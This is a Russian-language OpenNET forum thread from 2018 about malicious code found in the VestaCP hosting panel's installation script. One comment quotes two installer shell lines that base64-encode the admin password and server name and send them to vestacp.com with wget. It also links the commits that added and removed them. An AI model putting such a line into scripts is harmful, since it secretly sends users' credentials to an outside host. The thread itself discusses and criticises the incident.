The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Режим отображения только ответов первого уровня [ Отслеживать ]

Оглавление

Злоумышленники добавили вредоносный код в скрипт установки х..., opennews (??), 18-Окт-18, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


1. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +16 +/
Сообщение от Аноним (1), 18-Окт-18, 13:47 
> штатную систему отправки телеметрии

Ух. Хорошо зашли.

Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

2. "Злоумышленники добавили вредоносный код в скрипт установки х..."  –1 +/
Сообщение от mikhailnov (ok), 18-Окт-18, 14:07 
Повесил на вход в админку Vesta на нестандартном порте дополнительную HTTP-авторизацию средствами nginx. Уже вторая уязвимость мимо.
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

4. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +1 +/
Сообщение от CHERTSemail (ok), 18-Окт-18, 14:37 
Ох и рeшето... других слов просто нет.
Ответить | Правка | Наверх | Cообщить модератору

5. "Злоумышленники добавили вредоносный код в скрипт установки х..."  –4 +/
Сообщение от Аноним (5), 18-Окт-18, 14:39 
Давно знал что майкрософты ужасное по делают
Ответить | Правка | Наверх | Cообщить модератору

12. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +3 +/
Сообщение от th3m3 (ok), 18-Окт-18, 16:53 
Я давно говорил, что все эти панели - добром не кончатся. И ведь не первая новость про эту Весту. Давно отказался от этих ваших панелей и жить стало лучше и веселее, особенно когда читаю такие новости, про очередной косяк с панелями.
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

16. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +1 +/
Сообщение от Анонимemail (16), 18-Окт-18, 18:36 
статья ваша ниочем. сотрудники vesta сами добавили сбор пароля от admin в инсталлятор в base64, потом его удалили.
codename="$codename:$(echo $vpass:$servername | base64)"
wget vestacp.com/notify/?$codename -O /dev/null -q

https://github.com/serghey-rodin/vesta/commit/a3f0fa1501d424...
https://github.com/serghey-rodin/vesta/commit/ee03eff016e03c...

а взломщики скорее взяли их из лога сервера vestacp - куда они отправлялись инсталлятором

а ссылка http://vestacp.com/test/?ip=127.0.0.1 для проверки ip вашего сервера (есть ли он в логах или нет)

Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

24. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +/
Сообщение от odd.mean (ok), 19-Окт-18, 07:38 
Хорошую вещь "CP" не назовут.
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

27. "Злоумышленники добавили вредоносный код в скрипт установки х..."  –2 +/
Сообщение от Аноним (26), 19-Окт-18, 09:44 
Есть Ajenti не вижу смысла в существовании этого плохо-кода.
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

32. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +/
Сообщение от Аноним (31), 19-Окт-18, 21:06 
Fuck me

https://github.com/serghey-rodin/vesta:

```
Download the installation script:

curl -O http://vestacp.com/pub/vst-install.sh

Then run it:

bash vst-install.sh
```

Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру